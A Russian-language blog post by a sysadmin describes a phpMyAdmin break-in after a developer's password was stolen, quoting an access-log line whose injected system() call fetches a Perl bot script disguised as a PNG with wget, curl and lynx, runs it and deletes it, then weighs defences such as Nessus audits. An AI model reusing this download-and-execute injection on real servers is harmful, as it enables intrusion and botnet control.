nlothik (nlothik) wrote,
nlothik
nlothik

История одного взлома

Началось всё достаточно банально. У дурака-девелопера спёрли пароль. Но что было дальше -- меня немного удивило.

Из Китая зашли под паролем девелопера, и загрузили на сайт полный дистибутив PHPMyAdmin годичной давности. В нём, разумеется, было навалом дыр. Далее, на протяжении аж двух недель этой дыркой пытались воспользоваться. И, наконец, воспользовались.

В логе было вот такое:

ip_hidden - - [13/Feb/2012:01:02:13 -0600] "GET /phpmyadmin/\rconfig/config.inc.php?eval=system('echo cd /tmp;wget http://ip_hidden/apache_32.png;mv apache_32.png -O p2.txt;curl -O http://ip_hidden/apache_32.png;mv apache_32.png; mv apache_32.png p.txt;lynx -DUMP http://ip_hidden/apache_32.png;mv apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 200 9497 "-" "curl/7.19.2 (i686-pc-linux-gnu) libcurl/7.19.2 OpenSSL/0.9.8i zlib/1.2.3 libidn/1.5"

Что делает эта штука? Скачивает файл apache_32.png, который на самом деле не картинка, а Перловый скрипт, переименовывает его, запускает через Перл, и стирает сам файл скрипта.

Скрипт дальше делает всё, что хочет хозяин скрипта (это ботовый скрипт).

Я вот думаю, а как от этого уберечься?

Вижу несколько вещей, которые можно бы сделать.

1. Автоматический аудит веб скриптов через NESSUS.
2. Запретить PHP выполнять сторонние программы. Не решение -- некоторые сайты используют тот же Image Magick, и он перестанет работать.

В-общем, как-то особо и нет решений, кроме аудита.

Может, кто из более бородатых что подскажет.
Tags: компьютерное, сисадминское
Subscribe

  • Как я рад

    …что ещё в 2020 году заставил контору избавиться от CrowdStrike и перейти на BitDefender. Конечно же, я не мог предсказать, что они так…

  • Бродком — редкостные козлы

    Клянусь, всё, чего не касаются Бродком, незамедлительно превращается… назад в тыкву. Симантек был хороший — стал говно. Теперь пришла…

  • Рамадан месяц

    На прошлой неделе сотрудник-мусульманин, с которым я разговорился на тему Ислама, охренев от познаний голубоглазой белой обезьяны в этой области, аж…

  • Post a new comment

    Error

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

    When you submit the form an invisible reCAPTCHA check will be performed.
    You must follow the Privacy Policy and Google Terms of use.
  • 0 comments